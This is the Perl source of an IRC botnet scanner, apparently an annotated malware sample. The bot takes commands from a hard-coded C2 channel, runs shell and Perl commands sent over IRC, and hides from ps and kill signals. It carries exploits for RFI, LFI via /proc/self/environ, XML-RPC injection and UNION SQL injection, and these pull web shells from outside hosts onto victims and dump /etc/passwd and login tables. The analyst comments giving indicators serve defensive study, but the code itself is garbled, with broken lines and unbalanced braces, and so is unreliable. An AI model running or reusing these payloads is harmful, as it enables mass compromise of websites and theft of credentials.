/usr/bin/perl
################################################
use HTTP::Request; #
use HTTP::Request::Common; #
use LWP::Simple; #
use LWP::UserAgent; #
use Socket; #
use IO::Socket; #
use IO::Socket::INET; #
use IO::Select; #
use MIME::Base64; #
################################################
# --- Bot configuration and daemonisation (analysis notes; code left as found) ---
# Hard-coded command-and-control parameters: IRC server, port, nick, ident,
# channel and the operator nick the bot reports results to. These literals
# are the most direct network/behavioural indicators for this sample.
my $datetime = localtime;
my $ircserver = "irc.byroe.net";
my $ircport = "6667";
my $nickname = "timlopus";
my $ident = "jems";
my $channel = "#kabo";
my $admin = "Susis";
# mIRC colour-coded prefixes prepended to channel output by each module.
my $nob0dy = "#15,1(#4@#9AspAlt#15)#";
my $lfilogo = "#15,1(#4@#9LFI#15)";
my $rfilogo = "#15,1(#4@#9RFI#15)";
my $xmllogo = "#15,1(#4@#9XML#15)";
my $sqllogo = "#15,1(#4@#9SQL#15)";
my $oscologo = "#15,1(#4@#9OSCO#15)";
my $zenlogo = "#15,1(#4@#9ZEN#15)";
my $oplogo = "#15,1(#4@#9OPEN#15)";
my $lokologo = "#15,1(#4@#9LOKO#15)";
my $thumblogo = "#15,1(#4@#9TIMTHUMB#15)";
# Trigger words the bot listens for in channel traffic (dispatched in parse()).
my $lficmd = '!lfi';
my $rficmd = '!rfi';
my $xmlcmd = '!xml';
my $sqlcmd = '!sql';
my $oscocmd = '!osco';
my $zencmd = '!zen';
my $lokocmd = '!loko';
my $opcmd = '!op';
my $thumbcmd = '!thumb';
my $cmdlfi = '!cmdlfi';
my $cmdxml = '!cmdxml';
# Remote payload URLs the scanning modules pull onto hosts they hit.
# Outbound requests for these URLs, or the filenames they carry, are a
# usable detection signal on both the scanning host and its targets.
my $injector = "http://www.kms4u.co.kr/data/cheditor/1704/ipays.jpg";
my $botshell = "http://apnewstime.com//wp-includes/js/byroe.jpg";
my $botshell2 = "http://apnewstime.com//wp-includes/js/allnet.jpg";
my $thumbshell = "http://blogger.com.papetariechic.ro/jack.php";
# NOTE(review): @uagents is never populated anywhere in this view -- the
# user-agent list was presumably lost when the page was extracted, so as
# written this indexes an empty array and yields undef.
my $uagent = $uagents[rand(scalar(@uagents))];
# Directory-traversal suffix appended to candidate URLs by the !cmdlfi
# handler; the page wraps the literal across two lines.
my $lfdtest =
"../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
environ%00";
my $open_test =
"/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
# Table- and column-name wordlists consumed by sqlbrute() and tabelka().
# Several entries are split mid-word by the page's line wrapping
# (e.g. 'miem'/'bro', 'u'/'ser_password'), so the lists as shown do not parse.
my @tabele =
('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table','miem
bro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','u
ser_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email','user_emails',
'user_mail','user_mails','mail','emails','email','address',
'e-
mail','emailaddress','correo','correos','phpbb_users','log','logins','login','regis
ters','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administr
ador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id
',
'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','
tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','m
embros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur
','tuser','tusers','utilisateurs','password','amministratore','god','God','authors'
,
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Me
mbers','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','U
SUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny =
('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','mem
bros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_unam
e','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','
nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_pas
sword','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','u
ser_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor'
,'upassword','web_password','web_username');
# Ignore the usual termination signals so the process survives terminal
# hangups and plain kill/Ctrl-C; only SIGKILL would stop it. 'PS' is not a
# standard signal name and would be rejected under warnings.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
# Overwrite the process name shown by ps/top with a decoy, padded with NULs.
# $fakeproc is not defined anywhere in this view, so here it reads as empty.
$0 = "$fakeproc"."\0" x 16;;
# Detach into the background: the parent exits, the child carries on.
my $pid = fork;
exit if $pid;
our %irc_servers;
our %DCC;
# Undeclared global: the IO::Select set the read loop in parse() polls.
$sel_client = IO::Select->new();
# sendraw(): only the header survives on this page. The body that writes a
# line to the IRC socket is missing, and the sub is never closed before
# connector() begins, so this span does not parse as shown.
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
} else {
# connector(nick, server, port): opens the TCP connection to the C2 server,
# registers the socket with the selector and records it in %irc_servers.
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
# On connect failure this returns 1 rather than undef, so the defined()
# test that follows can never observe a missing socket.
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
# $IRC_cur_socket is an undeclared global shared with parse().
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
# nick() is not present in this view; presumably sends the NICK line.
nick("$mynick");
sleep (1);}}
# parse(line): the C2 message handler. Most of the regexes that populate
# $1..$5 below were lost in extraction, so the capture variables are used
# here without a visible match. What remains shows: PING/PONG keepalive,
# nick-collision handling, channel join, a select()-driven read loop, and a
# command dispatcher keyed on the !trigger words defined at the top of the
# file. Several if-blocks are unclosed; the structure is not recoverable.
sub parse {
my $servarg = shift;
sendraw("PONG :$1");
# Nick already in use: switch to the server-assigned nick and retry.
# int rand(1) is always 0, so the retry nick is just "<nick>0".
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
nick("$mynick".int rand(1));
}
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("JOIN $channel");
sleep(2);
my $line_temp;
# Non-blocking poll of the IRC socket; $nread/$fh/$ircmsg are set by a
# sysread that is not visible on this page.
while( 1 ) {
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
# Zero-length read means the server closed the connection.
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
$ircmsg =~ s/\r\n$//;
# Sender nick/ident/host, destination (channel or our nick) and text.
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
my $engine
="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe
,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,Wa
LLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
# Private-message branch: answers CTCP VERSION with a spoofed mIRC banner
# to blend in with ordinary clients.
if ($path eq $mynick) {
if ($msg =~ /^#VERSION#/) {
sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
if ($msg =~ /^#TIME#/) {
# shell() is not in this view; from the arguments it looks like a
# local command runner whose output goes back to $path -- confirm.
&shell("$path","kill -9 $$");
&shell("$path","killall -9 perl");
sendraw("QUIT :Restarting...");
sendraw("JOIN #".$1);
sendraw("PART #".$1);
}
sendraw("NICK ".$1);
# The whole private message is handed to shell() unfiltered.
&shell("$nick","$msg");
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$nick);
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$nick);
}
}
else {
&shell("$path","kill -9 $$");
&shell("$path","killall -9 perl");
sendraw("QUIT :Restarting...");
sendraw("JOIN #".$1);
sendraw("PART $path");
sendraw("PART #".$1);
}
&shell("$path","$1");
&shell("$path","$1");
# String eval of a capture taken from the incoming IRC line: whoever can
# get a message to the bot (operator, or anyone who takes over the channel
# or server) runs arbitrary Perl in this process. The guarding regex is
# not visible here.
eval "$1";
##################################################################### HIT
# Channel commands. Each scanner trigger forks (fork/waitpid fragments
# below) and hands off to scan_start() with a numeric module id:
# 1 rfi, 2 lfi, 3 xml, 4 sql, 5 osco, 6 loko, 7 op, 8 zen, 9 thumb.
if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$path);
if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$path);
if ($msg=~ /^!help/) {
my $helplogo = "#15,1(#4@#9Help#15)";
&msg("$path","$helplogo #14
######################9[HELP]#14###############################");
&msg("$path","$helplogo #7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|
$thumbcmd [bug][dork]|!portscan[ip][port]) )#");
if ($msg=~ /^!engine/) {
my $enginelogo = "#15,1(#4@#9EnginE#15)";
&msg("$path","$enginelogo #4
GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio#");
&msg("$path","$enginelogo #4
WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo#");
&msg("$path","$enginelogo #4
BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR#");
if ($msg=~ /^!about/) {
if ($msg=~ /^!version/) {
my $versionlogo = "#15,1(#4@#9Version#15)";
# isFound() (below) checks that the remote payload is still reachable
# before a scan is started; with the page's version it always returns 0.
if (&isFound($injector,"html")) {
} else {
if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,1);
} else {
exit;
if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,2);
} else {
exit;
if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
waitpid($pid, 0);
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,3);
} else {
exit;
if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
}
else {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,4);
exit;
if ($msg=~ /^$oscocmd\s+(.*)/) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ("admin/categories.php/login.php?
cPath=&action=new_product_preview",$1);
&scan_start($path,$bug,$dork,$engine,5);
} else {
exit;
if ($msg=~ /^$oscocmd\s+(.*)/) {
waitpid($pid, 0);
}
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ("admin/file_manager.php/login.php",
$1);
&scan_start($path,$bug,$dork,$engine,5);
} else {
exit;
if ($msg=~ /^$lokocmd\s+(.*)/) {
waitpid($pid, 0);
}
else {
my ($bug,$dork) = ("filemanager/browser.html",$1);
&scan_start($path,$bug,$dork,$engine,6);
exit;
if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
# $bug/$dork are not assigned in this branch as shown.
&scan_start($path,$bug,$dork,$engine,7);
exit;
if ($msg=~ /^$zencmd\s+(.*)/) {
waitpid($pid, 0);
else {
my ($bug,$dork) =
("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
&scan_start($path,$bug,$dork,$engine,8);
exit;
if ($msg=~ /^$zencmd\s+(.*)/) {
waitpid($pid, 0);
else {
my ($bug,$dork) = ("admin/record_company.php",$1);
&scan_start($path,$bug,$dork,$engine,8);
exit;
}
##################################################################### TIMTHUMB.PHP
SCAN (ADDED)
if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,9);
exit;
#####################################################################
}
}
# Line reassembly: a read may end mid-line, so the tail is kept in
# $line_temp and prepended to the next read. @lines/$c/$line come from a
# split that is not visible here.
$line = $lines[$c];
$line_temp = '';
$line =~ s/\r$//;
&parse("$line");
} else {
if ($#lines == 0) {
&parse("$line");
&parse("$line");
&parse("$line");
} else {
$line_temp = $line;
}
}
#########################################
# type(chan, bug, dork, engine, type): maps the numeric module id from
# parse() onto a scanner sub. Only the id-1 (rfi) arm survives on this page.
# Declared with an empty prototype, but every call site uses &type(...),
# which bypasses prototype checking anyway.
sub type () {
my ($chan,$bug,$dork,$engine,$type) = @_;
if ($type == 1){&rfi($chan,$bug,$dork,$engine);}
# scan_start(chan, bug, dork, engine, type): runs one scan per search engine
# named in $engine (substring match, case-insensitive). The repeated
# "} exit; }" fragments are the tails of a fork-per-engine wrapper whose
# opening lines were lost; the two surviving "if ($pid = fork)" lines show
# the intended shape (parent waits, child scans and exits).
sub scan_start() {
my ($chan,$bug,$dork,$engine,$type) = @_;
if ($engine =~ /google/i) {
&type($chan,$bug,$dork,"GooGLe",$type);
} exit; }
if ($engine =~ /google2/i) {
&type($chan,$bug,$dork,"GooGle2",$type);
} exit; }
if ($engine =~ /bing/i) {
&type($chan,$bug,$dork,"Bing",$type);
} exit; }
}
if ($engine =~ /altavista/i) {
&type($chan,$bug,$dork,"ALtaViSTa",$type);
} exit; }
if ($engine =~ /ask/i) {
&type($chan,$bug,$dork,"AsK",$type);
} exit; }
if ($engine =~ /uol/i) {
&type($chan,$bug,$dork,"UoL",$type);
} exit; }
}
if ($engine =~ /yahoo/i) {
&type($chan,$bug,$dork,"YahOo",$type);
} exit; }
if ($engine =~ /clusty/i) {
&type($chan,$bug,$dork,"CluSty",$type);
} exit; }
# gutser arm is empty here; its &type() call did not survive extraction.
if ($engine =~ /gutser/i) {
} exit; }
if ($engine =~ /rediff/i) {
&type($chan,$bug,$dork,"ReDiff",$type);
} exit; }
if ($engine =~ /virgilio/i) {
&type($chan,$bug,$dork,"VirgiLio",$type);
} exit; }
if ($engine =~ /webde/i) {
&type($chan,$bug,$dork,"WebDe",$type);
} exit; }
if ($engine =~ /exalead/i) {
&type($chan,$bug,$dork,"ExaLead",$type);
} exit; }
if ($engine =~ /lycos/i) {
&type($chan,$bug,$dork,"LyCos",$type);
} exit; }
if ($engine =~ /hotbot/i) {
if ($pid = fork) { waitpid($pid, 0); }
&type($chan,$bug,$dork,"HotBot",$type);
} exit; }
if ($engine =~ /aol/i) {
&type($chan,$bug,$dork,"AoL",$type);
} exit; }
if ($engine =~ /sapo/i) {
&type($chan,$bug,$dork,"SaPo",$type);
} exit; }
}
if ($engine =~ /duck/i) {
&type($chan,$bug,$dork,"DuCk",$type);
} exit; }
if ($engine =~ /lygo/i) {
&type($chan,$bug,$dork,"LyGo",$type);
} exit; }
if ($engine =~ /yause/i) {
&type($chan,$bug,$dork,"YauSe",$type);
} exit; }
}
if ($engine =~ /baidu/i) {
&type($chan,$bug,$dork,"BaiDu",$type);
} exit; }
if ($engine =~ /kipot/i) {
&type($chan,$bug,$dork,"KiPoT",$type);
} exit; }
if ($engine =~ /gibla/i) {
&type($chan,$bug,$dork,"GiBLa",$type);
} exit; }
if ($engine =~ /black/i) {
&type($chan,$bug,$dork,"BLacK",$type);
} exit; }
if ($engine =~ /onet/i) {
&type($chan,$bug,$dork,"oNeT",$type);
} exit; }
if ($engine =~ /sizuka/i) {
&type($chan,$bug,$dork,"SiZuka",$type);
} exit; }
if ($engine =~ /walla/i) {
&type($chan,$bug,$dork,"WaLLa",$type);
} exit; }
if ($engine =~ /demos/i) {
&type($chan,$bug,$dork,"DeMos",$type);
} exit; }
if ($engine =~ /rose/i) {
if ($pid = fork) { waitpid($pid, 0); }
&type($chan,$bug,$dork,"RoSe",$type);
} exit; }
if ($engine =~ /seznam/i) {
&type($chan,$bug,$dork,"SeZnaM",$type);
} exit; }
if ($engine =~ /tiscali/i) {
&type($chan,$bug,$dork,"TisCali",$type);
} exit; }
}
if ($engine =~ /naver/i) {
&type($chan,$bug,$dork,"NaVeR",$type);
} exit; }
# rfi(chan, bug, dork, engine): remote-file-inclusion module. For every host
# returned by search_engine() it issues four GETs against "<host><bug>":
# a probe ("test??"), the $injector URL and both $botshell URLs. The
# "http://...jpg??" suffix on a request parameter is the log-side signature
# of this scanner. The loop body exits after the first host as shown.
sub rfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
my $coba = "http://".$site.$bug."test??";
my $test = "http://".$site.$bug.$injector."??";
my $dor = "http://".$site.$bug.$botshell."??";
my $dor2 = "http://".$site.$bug.$botshell2."??";
my $cek = &get_content($coba);sleep(1);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
&rfi_xpl($test,$chan,$site);
exit;}
}
# rfi_xpl(url, chan, site): second-stage fetch of the same payload URLs and
# a report line tagged "(ByroeNet)". The response parsing that would fill
# $safe/$os/$free, and the sub's closing brace, are missing on this page.
sub rfi_xpl() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $dor = $url.$botshell."??";
my $dor2 = $url.$botshell2."??";
my $test = $url.$injector."??";
my $vuln = $url."#14(ByroeNet)";
my $check = &get_content($test);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
my $safe ="";
my $os ="";
my $free ="";
# lfi(chan, bug, dork, engine): local-file-inclusion module built on the
# /proc/self/environ technique: the PHP code in $code is base64-encoded and
# sent via lfi_env_query() (the request builder that would place it in a
# header is not visible here). Markers "c0li#...#c0li" and "SUCCESS" in the
# response are taken as confirmation; the copied files land in /tmp as
# ipays, dev and maza, which are host-side indicators. $site is used without
# the enclosing foreach, and $upload is never assigned in this view.
sub lfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $dir = "../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $vuln = "http://".$site."#12".$bug.$dir."/proc/self/environ%0000";
my $shell = "http://".$site."#12".$bug.$dir."/tmp/ipays%0000";
my $html = &get_content($test);
my $code = 'echo
"c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.
$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.
$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';
my $res = lfi_env_query($test,encode_base64($code));
&lfi_spread_query($test);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");
$res =~ s/\n//g;
if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
my $sys = $1;
$nob0dy = $2;
my $sys = $1;
$nob0dy = $2;
my $wget = lfi_env_query($test,encode_base64($upload));
sleep(2);
my $check = &get_content("http://".$site.$bug.
$dir."/tmp/ipays%0000"); sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);
# Successful hits are reported privately to the operator ($admin), not
# to the channel.
&msg("$admin","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell."
#15(#4@#3".$sys."#15)#15(#4@#9$nob0dy#15)#");sleep(2);
else {
} exit; }
else
{ &msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9EnviRon#15)#10 ".$vuln); }
} exit; } sleep(2);
# lfi_env_query(url, code): sends the prepared request and returns the body.
# $ua and $req are not created in this view (the HTTP::Request construction
# was dropped), so $code is unused as shown.
sub lfi_env_query() {
my $url = $_[0];
my $code = $_[1];
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;
}
# lfi_spread_query(url): same shape as above; sub is not closed on this page.
sub lfi_spread_query() {
my $url = $_[0];
$ua->timeout(7);
my $res = $ua->request($req);
# xml(chan, bug, dork, engine): XML-RPC module. A host is considered
# interesting when a plain GET of "<host><bug>" contains "faultCode"; the
# crafted methodCall in xml_cek_query() is then POSTed and the response is
# checked for the "j13mb0t" marker. The file names fetched afterwards
# (aspaltx.php, byroe.php, allnet.php) are the host-side indicators.
# $site is used without a visible foreach; the sub has no matching braces.
sub xml() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site.$bug;
my $vuln = "http://".$site."#13".$bug;
my $html = &get_content($test);
if ($html =~ /faultCode/ ) {
my $resp = &xml_cek_query($test);
if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
&xml_spread_query($test);sleep(2);
my $sys = $1;
my $check = &get_content("http://".$site."aspaltx.php");
&get_content("http://".$site."byroe.php");
&get_content("http://".$site."allnet.php");
else {
sleep(2); } exit; } }
# xml_cek_query(url): POSTs the XML-RPC body as text/xml using POST from
# HTTP::Request::Common. $exploit is appended to but never initialised here,
# and $code/$ua are not defined in this view. The literal
# "<methodName>test.method</methodName>" plus "<name>',''));" is a fixed
# request-body signature a WAF or IDS rule can match.
sub xml_cek_query() {
my $url = $_[0];
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13mb0t';".
$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
return $res->content;
# xml_spread_query(target): same body with $xmlsprd in place of $code;
# $userAgent is a different, equally undefined, agent variable. Truncated.
sub xml_spread_query() {
my $xmltargt = $_[0];
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13m';".
$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
$userAgent->timeout(7);
# sql(chan, bug, dork, engine): SQL-injection module. Appends a single quote
# to "<host><bug>" and (in the error-matching code that is missing here)
# classifies the response as MySQL / MsSQL / MsAccess before calling
# sqlbrute(). Braces do not balance on this page.
sub sql() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site.$bug."'";
my $vuln = "http://".$site."#4".$bug;
my $sqlsite = "http://".$site.$bug;
my $html = &get_content($test);
&sqlbrute($sqlsite,$chan,$engine);}
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsSQL#15)#13 ".
$vuln);}
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsAccess#15)#13 ".
$vuln);}
&sqlbrute($sqlsite,$chan,$engine);}
} exit; sleep(2); }
# sqlbrute(site, chan, engine): UNION-based column-count and table
# enumeration. 0x6c6f67696e70776e7a is the ASCII string "loginpwnz", which
# is what the response checks look for; 0x2f6574632f706173737764 is
# "/etc/passwd", confirmed by the /root:x:/ test. Both hex literals and the
# "-1+union+select" prefix are constant, so they make reliable web-log and
# WAF signatures. The column loop, the get() calls that refresh $response,
# and most braces were lost in extraction; $column/$union/$inyection/
# $loadfile/$loadcont/$response are undeclared globals. get() comes from
# LWP::Simple.
sub sqlbrute() {
my $situs=$_[0];
my $chan =$_[1];
my $engine=$_[2];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
$inyection = '';
$union = '';
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
$column ++;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."information_schema.tables".$cfin;
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13INFO_SCHEMA#15)#13
$sql #");
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."mysql.user".$cfin;
if($response =~ /loginpwnz/)
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."mysql.user".$cfin;
else
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
if($response =~ /root:x:/)
else
# Falls back to guessing table names from the @tabele wordlist.
foreach $tabla(@tabele)
chomp($tabla);
$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
if($response =~ /loginpwnz/)
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.
$cmn."from".$cmn.$tabla.$cfin;
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13Tabel#15)#13 $sql
#");
&tabelka($situs,$tabla,$chan,$engine);
# tabelka(site, table, chan, engine): for a table found above, tries each
# name in @kolumny and reports site/column/table to the channel when the
# marker comes back. Only a fragment survives: no get() call, no braces.
sub tabelka() {
my $situs =$_[0];
my $tabla =$_[1];
my $chan =$_[2];
my $engine=$_[3];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
chomp($columna);
$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.
$tabla.$cfin;
if ($response =~ /loginpwnz/)
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13SQLi Vuln#15)#9
$situs #14(#4@#13Kolom#14)#13 $columna #14(#4@#13Tabel#14)#13 $tabla #");
# osco(chan, bug, dork, engine): osCommerce admin-bypass module. Fetches
# "<host><bug>" and hands the URL to osco_xpl(); the response check that
# gated the call is commented out / missing. $site has no visible foreach
# in osco2(); braces do not balance.
sub osco() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
my $test = "http://".$site.$bug;
my $html = &get_content($test);
# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);
&osco_xpl($test,$chan,$site,$engine);
} else { }
} exit; sleep(2); }
# osco_xpl(url, chan, site, engine): the upload requests themselves are
# missing -- $res/$resa/$resb/$resc are read but never assigned here. What
# remains fetches images/aspaltx.php, images/byroe.php and images/allnet.html
# on the target and reports them to the channel and to $admin; those three
# paths under images/ are the host-side indicators for this module.
sub osco_xpl() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);
# $safe/$os/$free are reported but never filled in on this page.
my $safe ="";
my $os ="";
my $free ="";
&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);
&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
